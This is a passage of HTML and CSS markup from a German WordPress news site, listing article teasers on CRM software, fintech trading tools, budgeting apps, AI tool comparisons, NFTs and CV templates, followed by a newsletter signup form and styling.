  1502.                                    <a href="https://nachrichtenmorgen.de/author/mianbunny/" aria-label="author-photo" class="td-author-photo"><img alt='Jack Hobin' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Jack Hobin' src='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-04-30T17:22:43+02:00" >April 30, 2024</time></span>                                                                                                        </span>
  1503.                                                    </div>
  1504.                    
  1505.                    
  1506.                    
  1507.                                    </div>
  1508.            </div>
  1509.        </div>
  1510.  
  1511.        
  1512.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1513.            <div class="td-module-container td-category-pos-above">
  1514.                                    <div class="td-image-container">
  1515.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/wie-lime-technologies/"  rel="bookmark" class="td-image-wrap " title="Wie Lime Technologies die Landschaft des Kundenbeziehungsmanagements revolutioniert" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Wie-Lime-Technologies-die-Landschaft-des-Kundenbeziehungsmanagements-revolutioniert-696x390.jpg"  ></span></a></div>                                                                    </div>
  1516.                
  1517.                <div class="td-module-meta-info">
  1518.                                        
  1519.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/wie-lime-technologies/"  rel="bookmark" title="Wie Lime Technologies die Landschaft des Kundenbeziehungsmanagements revolutioniert">Wie Lime Technologies die Landschaft des Kundenbeziehungsmanagements revolutioniert</a></h3>
  1520.                    
  1521.                                            <div class="td-editor-date">
  1522.                                                        
  1523.                                                            <span class="td-author-date">
  1524.                                    <a href="https://nachrichtenmorgen.de/author/mianbunny/" aria-label="author-photo" class="td-author-photo"><img alt='Jack Hobin' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Jack Hobin' src='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-04-24T16:06:15+02:00" >April 24, 2024</time></span>                                                                                                        </span>
  1525.                                                    </div>
  1526.                    
  1527.                    
  1528.                    
  1529.                                    </div>
  1530.            </div>
  1531.        </div>
  1532.  
  1533.        
  1534.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1535.            <div class="td-module-container td-category-pos-above">
  1536.                                    <div class="td-image-container">
  1537.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/zenfund/"  rel="bookmark" class="td-image-wrap " title="ZenFund setzt fortschrittliche Technologie für intelligentere Finanztransaktionen ein" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/ZenFund-setzt-fortschrittliche-Technologie-fuer-intelligentere-Finanztransaktionen-ein-2-696x522.png"  ></span></a></div>                                                                    </div>
  1538.                
  1539.                <div class="td-module-meta-info">
  1540.                                        
  1541.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/zenfund/"  rel="bookmark" title="ZenFund setzt fortschrittliche Technologie für intelligentere Finanztransaktionen ein">ZenFund setzt fortschrittliche Technologie für intelligentere Finanztransaktionen ein</a></h3>
  1542.                    
  1543.                                            <div class="td-editor-date">
  1544.                                                        
  1545.                                                            <span class="td-author-date">
  1546.                                    <a href="https://nachrichtenmorgen.de/author/mianbunny/" aria-label="author-photo" class="td-author-photo"><img alt='Jack Hobin' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Jack Hobin' src='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-04-13T11:17:24+02:00" >April 13, 2024</time></span>                                                                                                        </span>
  1547.                                                    </div>
  1548.                    
  1549.                    
  1550.                    
  1551.                                    </div>
  1552.            </div>
  1553.        </div>
  1554.  
  1555.        
  1556.        <div class="td_module_flex td_module_flex_4 td_module_wrap td-animation-stack td-cpt-post">
  1557.            <div class="td-module-container td-category-pos-">
  1558.                
  1559.                <div class="td-module-meta-info">
  1560.                                        
  1561.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/havenhold/"  rel="bookmark" title="Havenhold nutzt fortschrittliche Technologie für intelligentere Finanztransaktionen">Havenhold nutzt fortschrittliche Technologie für intelligentere Finanztransaktionen</a></h3>
  1562.                    
  1563.                                            <div class="td-editor-date">
  1564.                                                        
  1565.                                                            <span class="td-author-date">
  1566.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-03-06T08:02:04+01:00" >März 6, 2024</time></span>                                                                                                        </span>
  1567.                                                    </div>
  1568.                    
  1569.                    
  1570.                                    </div>
  1571.            </div>
  1572.        </div>
  1573.  
  1574.        
  1575.        <div class="td_module_flex td_module_flex_4 td_module_wrap td-animation-stack td-cpt-post">
  1576.            <div class="td-module-container td-category-pos-">
  1577.                
  1578.                <div class="td-module-meta-info">
  1579.                                        
  1580.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/taurumax/"  rel="bookmark" title="Taurumax Einführt Echtzeit-Signale für Kluge Transaktionsentscheidungen">Taurumax Einführt Echtzeit-Signale für Kluge Transaktionsentscheidungen</a></h3>
  1581.                    
  1582.                                            <div class="td-editor-date">
  1583.                                                        
  1584.                                                            <span class="td-author-date">
  1585.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-03-06T07:47:03+01:00" >März 6, 2024</time></span>                                                                                                        </span>
  1586.                                                    </div>
  1587.                    
  1588.                    
  1589.                                    </div>
  1590.            </div>
  1591.        </div>
  1592.  
  1593.        
  1594.        <div class="td_module_flex td_module_flex_4 td_module_wrap td-animation-stack td-cpt-post">
  1595.            <div class="td-module-container td-category-pos-">
  1596.                
  1597.                <div class="td-module-meta-info">
  1598.                                        
  1599.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/haushaltsbuch-app-kostenlos-testsiegers/"  rel="bookmark" title="Haushaltsbuch App Kostenlos Testsieger: Die Top 50 Apps im Überblick">Haushaltsbuch App Kostenlos Testsieger: Die Top 50 Apps im Überblick</a></h3>
  1600.                    
  1601.                                            <div class="td-editor-date">
  1602.                                                        
  1603.                                                            <span class="td-author-date">
  1604.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-01-21T09:05:15+01:00" >Januar 21, 2024</time></span>                                                                                                        </span>
  1605.                                                    </div>
  1606.                    
  1607.                    
  1608.                                    </div>
  1609.            </div>
  1610.        </div>
  1611.  
  1612.        
  1613.        <div class="td_module_flex td_module_flex_4 td_module_wrap td-animation-stack td-cpt-post">
  1614.            <div class="td-module-container td-category-pos-">
  1615.                
  1616.                <div class="td-module-meta-info">
  1617.                                        
  1618.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/chatsonic-vs-hix-ai/"  rel="bookmark" title="Chatsonic vs. HIX.AI: Ist HIX.AI besser als Chatsonic?">Chatsonic vs. HIX.AI: Ist HIX.AI besser als Chatsonic?</a></h3>
  1619.                    
  1620.                                            <div class="td-editor-date">
  1621.                                                        
  1622.                                                            <span class="td-author-date">
  1623.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-01-19T08:44:38+01:00" >Januar 19, 2024</time></span>                                                                                                        </span>
  1624.                                                    </div>
  1625.                    
  1626.                    
  1627.                                    </div>
  1628.            </div>
  1629.        </div>
  1630.  
  1631.        
  1632.        <div class="td_module_flex td_module_flex_4 td_module_wrap td-animation-stack td-cpt-post">
  1633.            <div class="td-module-container td-category-pos-">
  1634.                
  1635.                <div class="td-module-meta-info">
  1636.                                        
  1637.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/eth-rechner/"  rel="bookmark" title="Der ultimative ETH Rechner: Sie über Ethereum und dessen Umrechnung wissen müssen">Der ultimative ETH Rechner: Sie über Ethereum und dessen Umrechnung wissen müssen</a></h3>
  1638.                    
  1639.                                            <div class="td-editor-date">
  1640.                                                        
  1641.                                                            <span class="td-author-date">
  1642.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-01-10T13:05:36+01:00" >Januar 10, 2024</time></span>                                                                                                        </span>
  1643.                                                    </div>
  1644.                    
  1645.                    
  1646.                                    </div>
  1647.            </div>
  1648.        </div>
  1649.  
  1650.        
  1651.        <div class="td_module_flex td_module_flex_4 td_module_wrap td-animation-stack td-cpt-post">
  1652.            <div class="td-module-container td-category-pos-">
  1653.                
  1654.                <div class="td-module-meta-info">
  1655.                                        
  1656.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/lebenslauf-erstellung-leicht-gemacht/"  rel="bookmark" title="Lebenslauf-Erstellung Leicht Gemacht: Nutzen Sie Maßgeschneiderte Vorlagen Für Einen Professionellen Lebenslauf">Lebenslauf-Erstellung Leicht Gemacht: Nutzen Sie Maßgeschneiderte Vorlagen Für Einen Professionellen Lebenslauf</a></h3>
  1657.                    
  1658.                                            <div class="td-editor-date">
  1659.                                                        
  1660.                                                            <span class="td-author-date">
  1661.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2023-12-26T13:55:59+01:00" >Dezember 26, 2023</time></span>                                                                                                        </span>
  1662.                                                    </div>
  1663.                    
  1664.                    
  1665.                                    </div>
  1666.            </div>
  1667.        </div>
  1668.  
  1669.        
  1670.        <div class="td_module_flex td_module_flex_4 td_module_wrap td-animation-stack td-cpt-post">
  1671.            <div class="td-module-container td-category-pos-">
  1672.                
  1673.                <div class="td-module-meta-info">
  1674.                                        
  1675.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/nfts-erstellt/"  rel="bookmark" title="Wie Man NfTs Erstellt Und Wo Man Sie Verkauft">Wie Man NfTs Erstellt Und Wo Man Sie Verkauft</a></h3>
  1676.                    
  1677.                                            <div class="td-editor-date">
  1678.                                                        
  1679.                                                            <span class="td-author-date">
  1680.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2023-12-11T14:31:48+01:00" >Dezember 11, 2023</time></span>                                                                                                        </span>
  1681.                                                    </div>
  1682.                    
  1683.                    
  1684.                                    </div>
  1685.            </div>
  1686.        </div>
  1687.  
  1688.        
  1689.        <div class="td_module_flex td_module_flex_4 td_module_wrap td-animation-stack td-cpt-post">
  1690.            <div class="td-module-container td-category-pos-">
  1691.                
  1692.                <div class="td-module-meta-info">
  1693.                                        
  1694.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/pixwox/"  rel="bookmark" title="Pixwox Enthüllt: Erkundung Der Neuen Welle in Den Sozialen Medien">Pixwox Enthüllt: Erkundung Der Neuen Welle in Den Sozialen Medien</a></h3>
  1695.                    
  1696.                                            <div class="td-editor-date">
  1697.                                                        
  1698.                                                            <span class="td-author-date">
  1699.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2023-11-30T10:20:01+01:00" >November 30, 2023</time></span>                                                                                                        </span>
  1700.                                                    </div>
  1701.                    
  1702.                    
  1703.                                    </div>
  1704.            </div>
  1705.        </div>
  1706.  
  1707.        
  1708.        <div class="td_module_flex td_module_flex_4 td_module_wrap td-animation-stack td-cpt-post">
  1709.            <div class="td-module-container td-category-pos-">
  1710.                
  1711.                <div class="td-module-meta-info">
  1712.                                        
  1713.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/how2invest/"  rel="bookmark" title="How2invest: Ein Leitfaden">How2invest: Ein Leitfaden</a></h3>
  1714.                    
  1715.                                            <div class="td-editor-date">
  1716.                                                        
  1717.                                                            <span class="td-author-date">
  1718.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2023-11-30T06:13:24+01:00" >November 30, 2023</time></span>                                                                                                        </span>
  1719.                                                    </div>
  1720.                    
  1721.                    
  1722.                                    </div>
  1723.            </div>
  1724.        </div>
  1725.  
  1726.        </div></div></div></div><div class="vc_column tdi_145  wpb_column vc_column_container tdc-column td-pb-span3 td-is-sticky">
  1727. <style scoped>.tdi_145{vertical-align:baseline}.tdi_145>.wpb_wrapper,.tdi_145>.wpb_wrapper>.tdc-elements{display:block}.tdi_145>.wpb_wrapper>.tdc-elements{width:100%}.tdi_145>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_145>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper" data-sticky-offset="20" data-sticky-is-width-auto="W2ZhbHNlLGZhbHNlLGZhbHNlLGZhbHNlXQ=="><div class="td_block_wrap td-a-rec td-a-rec-id-custom-spot td-a-rec-img tdi_146 td_block_template_1">
  1728. <style>.tdi_146{margin-bottom:35px!important}</style>
  1729. <style>.tdi_146.td-a-rec{text-align:center}.tdi_146.td-a-rec:not(.td-a-rec-no-translate){transform:translateZ(0)}.tdi_146 .td-element-style{z-index:-1}.tdi_146 .td-spot-id-spot_img_hidden{display:none}.tdi_146 .td-adspot-title{display:block}@media (min-width:768px) and (max-width:1018px){.tdi_146 .td_spot_img_all{display:none}.tdi_146 .td-adspot-title{display:block}}@media (max-width:767px){.tdi_146 .td_spot_img_all{display:none}.tdi_146 .td-adspot-title{display:block}}</style><div style="display: inline-block"><a href="https://nachrichtenmorgen.de/submit-guest-post/" rel="noopener"  class="td_spot_img_all"><img decoding="async" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E"  alt="spot_img" data-lazy-src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/www.nachrichtenmorgen.de_.jpg" /><noscript><img decoding="async" src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/www.nachrichtenmorgen.de_.jpg"  alt="spot_img" /></noscript></a><a href="https://nachrichtenmorgen.de/submit-guest-post/" rel="noopener"  class="td_spot_img_tp"><img decoding="async" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E"  alt="spot_img" data-lazy-src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/www.nachrichtenmorgen.de_.jpg" /><noscript><img decoding="async" src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/www.nachrichtenmorgen.de_.jpg"  alt="spot_img" /></noscript></a><a href="https://nachrichtenmorgen.de/submit-guest-post/" rel="noopener"  class="td_spot_img_mob"><img decoding="async" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E"  alt="spot_img" data-lazy-src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/www.nachrichtenmorgen.de_.jpg" /><noscript><img decoding="async" src="https://nachrichtenmorgen.de/wp-content/uploads/2023/02/www.nachrichtenmorgen.de_.jpg"  alt="spot_img" /></noscript></a></div></div><div class="td_block_wrap tds_leads tdi_147  td_block_template_1"  data-td-block-uid="tdi_147" >
  1730. <style>.tdi_147{margin-bottom:0px!important}</style>
  1731. <style>.tds_leads .tds-title{margin-top:0;margin-bottom:20px;font-size:22px;line-height:1.4;font-weight:600}.tds_leads .tds-form.tds-s-content{min-height:0}.tds_leads .tds-info:not(:empty){margin-bottom:16px}.tds_leads .tds-messages{padding:8px 12px;font-size:12px;line-height:1.4;color:#fff;border-radius:3px;transition:opacity .2s ease-in-out}.tds_leads .tds-messages:not(:last-child){margin-bottom:.4em}.tds_leads .tds-messages-hiding{opacity:0}.tds_leads .tds-messages-error{background-color:#ec4d4d}.tds_leads .tds-messages-success{background-color:#6bc16f}.tds_leads .tds-message:not(:last-child){margin-bottom:.4em}.tds_leads .tds-email-bar{display:flex}.tds_leads .tds-input-wrap{display:flex;align-items:center;flex:1}.tds_leads .tds-input{height:100%;padding:12px 15px;line-height:1;border-width:1px 0 1px 1px}.tds_leads .tds-unsubscribe-txt{width:100%;font-size:13px;line-height:1.4}.tds_leads .tds-submit-btn{-webkit-appearance:none;display:flex;align-items:center;width:100%;padding:15px;background-color:var(--td_theme_color,#4db2ec);font-size:13px;line-height:1;color:#fff;border-width:0;border-style:solid;border-color:#000;-webkit-transition:all 0.3s ease;transition:all 0.3s ease;outline:none}.tds_leads .tds-input-wrap+.tds-submit-btn{width:auto}.tds_leads .tds-submit-btn:hover{background-color:#222}.tds_leads .tds-submit-btn-icon{position:relative}.tds_leads i.tds-submit-btn-icon{font-size:15px;color:#fff}.tds_leads .tds-submit-btn-icon-svg{width:15px;height:auto}.tds_leads .tds-submit-btn-icon-svg svg{display:block;fill:#fff;-webkit-transition:all 0.3s ease;transition:all 0.3s ease}.tds_leads .tds-checkbox{margin-top:16px;line-height:1}.tds_leads .tds-checkbox input{display:none}.tds_leads .tds-checkbox label{display:flex;align-items:center;margin-bottom:0;cursor:pointer}.tds_leads .tds-check{position:relative;width:1em;height:1em;margin-right:8px;background-color:#fff;cursor:pointer;border:1px solid #ccc;transition:all .3s ease-in-out;flex-shrink:0}.tds_leads .tds-check:after{content:'';position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);width:0.5em;height:0.5em;background-color:var(--td_theme_color,#4db2ec);opacity:0;transition:all .3s ease;pointer-events:none}.tds_leads .tds-checkbox input:checked+label .tds-check:after{opacity:1}.tds_leads .tds-check-title{margin-top:-1px;user-select:none;-webkit-user-select:none;font-size:11px;color:#444}.tds_leads .tds-check-title a:hover{color:#222}body .tdi_147 .tds-title{margin-bottom:18px;font-family:Work Sans!important;font-size:24px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}body .tdi_147 .tds-messages-success{border-radius:2px}body .tdi_147 .tds-email-bar{flex-direction:column}body .tdi_147 .tds-input-wrap{margin:0 0 5px}body .tdi_147 .tds-input-wrap+.tds-submit-btn{margin:5px 0 0}body .tdi_147 .tds-input{padding:15px 10px;border-width:1px;border-style:solid;border-radius:3px;font-family:Work Sans!important;font-size:14px!important;line-height:1.2!important;font-weight:500!important}body .tdi_147 .tds-unsubscribe-txt{text-align:left}body .tdi_147 i.tds-submit-btn-icon{font-size:19px}body .tdi_147 .tds-submit-btn-icon-svg{width:19px}body .tdi_147 .tds-submit-btn-icon{margin-left:5px;top:0px}body .tdi_147 .tds-submit-btn{border-radius:3px;justify-content:center;background-color:#ec3535;font-family:Work Sans!important;font-size:13px!important;line-height:1.2!important;font-weight:700!important;text-transform:uppercase!important}body .tdi_147 .tds-checkbox label{font-size:16px}body .tdi_147 .tds-submit-btn:hover{background-color:#c11f1f}body .tdi_147 .tds-check-title{color:#000000;font-family:Work Sans!important;font-size:13px!important;line-height:1.2!important}body .tdi_147 .tds-check-title a{color:#ec3535}body .tdi_147 .tds-check-title a:hover{color:#c11f1f}body .tdi_147 .tds-message{font-family:Work Sans!important;font-size:13px!important;line-height:1.4!important;font-weight:600!important}@media (min-width:1019px) and (max-width:1140px){body .tdi_147 .tds-title{margin-bottom:14px}body .tdi_147 .tds-info:not(:empty){margin:0 0 12px}body .tdi_147 .tds-input{padding:12px 8px;font-size:13px!important}body .tdi_147 i.tds-submit-btn-icon{font-size:17px}body .tdi_147 .tds-submit-btn-icon-svg{width:17px}body .tdi_147 .tds-submit-btn{padding:12px;font-size:12px!important}body .tdi_147 .tds-title{font-size:22px!important}body .tdi_147 .tds-check-title{font-size:12px!important}}@media (min-width:768px) and (max-width:1018px){body .tdi_147 .tds-title{margin-bottom:12px}body .tdi_147 .tds-messages{padding:6px 10px}body .tdi_147 .tds-input{padding:10px 6px;font-size:12px!important}body .tdi_147 i.tds-submit-btn-icon{font-size:15px}body .tdi_147 .tds-submit-btn-icon-svg{width:15px}body .tdi_147 .tds-submit-btn-icon{margin-left:3px}body .tdi_147 .tds-submit-btn{padding:10px;font-size:11px!important}body .tdi_147 .tds-title{font-size:20px!important}body .tdi_147 .tds-message{font-size:12px!important}body .tdi_147 .tds-check-title{font-size:11px!important}}@media (max-width:767px){}</style><div class="tds-block-inner td-fix-index"><h3 class="tds-title">Abonnieren</h3><div class="tds-info"></div><form class="tds-form tds-s-content tds-s-content-sm" action="" method="post" name=""><input type="hidden" name="list" value="49"><input type="hidden" name="double_opt_in" value=""><input type="url" name="rdr_url" value="" style="display: none;"><div class="tds-email-bar"><div class="tds-input-wrap"><input class="tds-input" type="email" name="email" aria-label="email" placeholder="E-Mail-Addresse" required></div><button class="tds-submit-btn" type="submit" name="tds-subscribe">ich möchte rein<i class="tds-submit-btn-icon tdc-font-tdmp tdc-font-tdmp-arrow-right"></i></button></div><div class="tds-checkbox"><input id="pp_checkbox_tdi_147" class="" name="" value="Y" type="checkbox"><label class="checkbox subfield" for="pp_checkbox_tdi_147"><span class="tds-check"></span><span class="tds-check-title">Ich habe die gelesen und akzeptiere sie <a href="#">Datenschutz-Bestimmungen</a>.</span></label></div></form></div></div></div></div></div></div><div id="tdi_148" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_149  wpb_row td-pb-row tdc-element-style" >
  1732. <style scoped>.tdi_149,.tdi_149 .tdc-columns{min-height:0}.tdi_149,.tdi_149 .tdc-columns{display:block}.tdi_149 .tdc-columns{width:100%}.tdi_149{margin-top:220px!important;margin-bottom:60px!important;padding-bottom:60px!important;position:relative}.tdi_149 .td_block_wrap{text-align:left}@media (max-width:767px){.tdi_149{margin-bottom:60px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_149{margin-top:150px!important;margin-bottom:40px!important;padding-bottom:40px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_149{margin-top:170px!important;margin-bottom:40px!important;padding-bottom:40px!important}}</style>
  1733. <div class="tdi_148_rand_style td-element-style" ><style>.tdi_148_rand_style{background-color:#f7f7f7!important}</style></div><div class="vc_column tdi_151  wpb_column vc_column_container tdc-column td-pb-span12">
  1734. <style scoped>.tdi_151{vertical-align:baseline}.tdi_151>.wpb_wrapper,.tdi_151>.wpb_wrapper>.tdc-elements{display:block}.tdi_151>.wpb_wrapper>.tdc-elements{width:100%}.tdi_151>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_151>.wpb_wrapper{width:auto;height:auto}@media (min-width:768px) and (max-width:1018px){.tdi_151{padding-top:0px!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap td_block_title tdi_152 td-pb-border-top td_block_template_13 td-fix-index"  data-td-block-uid="tdi_152" >
  1735. <style>.td_block_template_13.widget>ul>li{margin-left:0!important}.global-block-template-13 .td-comments-title span{margin-left:0!important;font-size:20px}@media (max-width:767px){.global-block-template-13 .td-comments-title span{font-size:15px}}.td_block_template_13 .td-related-title a{margin-right:20px;font-size:20px}@media (max-width:767px){.td_block_template_13 .td-related-title a{font-size:15px}}.td_block_template_13 .td-related-title .td-cur-simple-item{color:var(--td_theme_color,#4db2ec)}.td_block_template_13 .td-related-title>a.td-related-right{margin-left:0!important}.td_block_template_13 .td-block-title{font-size:26px;font-weight:800;margin-bottom:26px;line-height:26px!important;padding:0;letter-spacing:-0.6px;margin-top:36px;transform:translateZ(0);-webkit-transform:translateZ(0);text-align:left}.td_block_template_13 .td-block-title a{color:#111}@media (max-width:1018px){.td_block_template_13 .td-block-title{font-size:22px;margin-bottom:16px;margin-top:26px}}@media (max-width:767px){.td_block_template_13 .td-block-title{margin-top:26px!important;margin-bottom:16px!important}}.td_block_template_13 .td-block-title>a,.td_block_template_13 .td-block-title>span{margin-left:12px;color:var(--td_text_header_color,#111)}@media (max-width:767px){.td_block_template_13 .td-block-title>a,.td_block_template_13 .td-block-title>span{margin-left:12px!important}}.td_block_template_13 .td-subcat-filter{line-height:1;display:table}.td_block_template_13 .td-subcat-dropdown .td-subcat-more{margin-bottom:8px!important;margin-top:7px}.td_block_template_13 .td-pulldown-category{font-family:'Roboto',sans-serif;font-size:14px;line-height:26px!important;color:#444;font-weight:500;position:absolute;right:0;bottom:-2px;top:0;margin:auto 0;display:table}.td_block_template_13 .td-pulldown-category span{display:inline-block;-webkit-transition:transform 0.5s ease;transition:transform 0.5s ease}@media (max-width:@responsive_p_phone_max){.td_block_template_13 .td-pulldown-category span{display:none}}.td_block_template_13 .td-pulldown-category i{font-size:10px;margin-left:10px}.td_block_template_13 .td-pulldown-category:hover{opacity:0.9}.td_block_template_13 .td-pulldown-category:hover span{transform:translate3d(-6px,0,0);-webkit-transform:translate3d(-6px,0,0)}.td_block_template_13 .td-block-subtitle{font-size:90px;text-transform:uppercase;position:absolute;left:-4px;z-index:-1;bottom:-20px;white-space:nowrap;color:#f3f3f3;line-height:1}@media (min-width:768px) and (max-width:1018px){.td_block_template_13 .td-block-subtitle{font-size:70px;bottom:-15px}}@media (max-width:767px){.td_block_template_13 .td-block-subtitle{font-size:60px;bottom:-12px}}.td_block_template_13 .td-title-align{margin-top:0!important}.td_block_template_13 .td-title-align>a,.td_block_template_13 .td-title-align>span{margin-left:0!important}@media (min-width:768px) and (max-width:1018px){.td-pb-span4 .td_block_template_13 .td-pulldown-category span{display:none}}@media (min-width:768px){.td-pb-span4 .td_block_template_13 .td-block-subtitle{display:none}}.td-pb-span4 .td_block_template_13 .td-block-title{margin-top:0}.td-pb-span4 .td_block_template_13 .td-block-title *>{margin-left:0}.td-pb-span12 .td_block_template_13 .td-block-title{margin-bottom:40px}@media (min-width:768px) and (max-width:1018px){.td-pb-span12 .td_block_template_13 .td-block-title{margin-bottom:26px}}.tdi_152 .td-block-title>a,.tdi_152 .td-block-title>span{color:#000000!important}.tdi_152 .td-block-subtitle{color:#f7f7f7!important}.tdi_152{margin-top:-220px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_152{margin-top:-170px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_152{margin-top:-155px!important}}</style>
  1736. <style>body .tdi_152 .td-block-title a,body .tdi_152 .td-block-title span{font-family:Work Sans!important;font-size:32px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}body .tdi_152 .td-block-title{text-align:center}body .tdi_152.td_block_template_4 .td-block-title>*:before,body .tdi_152.td_block_template_17 .td-block-title:after,body .tdi_152.td_block_template_13 .td-block-subtitle,body .tdi_152.td_block_template_9 .td-block-title:after{right:0;left:0}body .tdi_152.td_block_template_5 .td-block-title>*{border-width:0 0 0 4px}body .tdi_152.td_block_template_8 .td-block-title>*{padding-left:20px;padding-right:20px}@media (min-width:1019px) and (max-width:1140px){body .tdi_152 .td-block-title a,body .tdi_152 .td-block-title span{font-size:26px!important}}@media (min-width:768px) and (max-width:1018px){body .tdi_152 .td-block-title a,body .tdi_152 .td-block-title span{font-size:20px!important}}</style><div class="td-block-title-wrap"><h4 class="td-block-title td-title-align"><span>Geschäft &amp; Politik</span><div class="td-block-subtitle"></div></h4></div></div><div class="td_block_wrap td_flex_block_1 tdi_153 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_153" >
  1737. <style>.tdi_153{margin-bottom:20px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_153{margin-top:-10px!important;margin-bottom:15px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_153{margin-top:-20px!important;margin-bottom:10px!important}}@media (max-width:767px){.tdi_153{margin-bottom:30px!important}}</style>
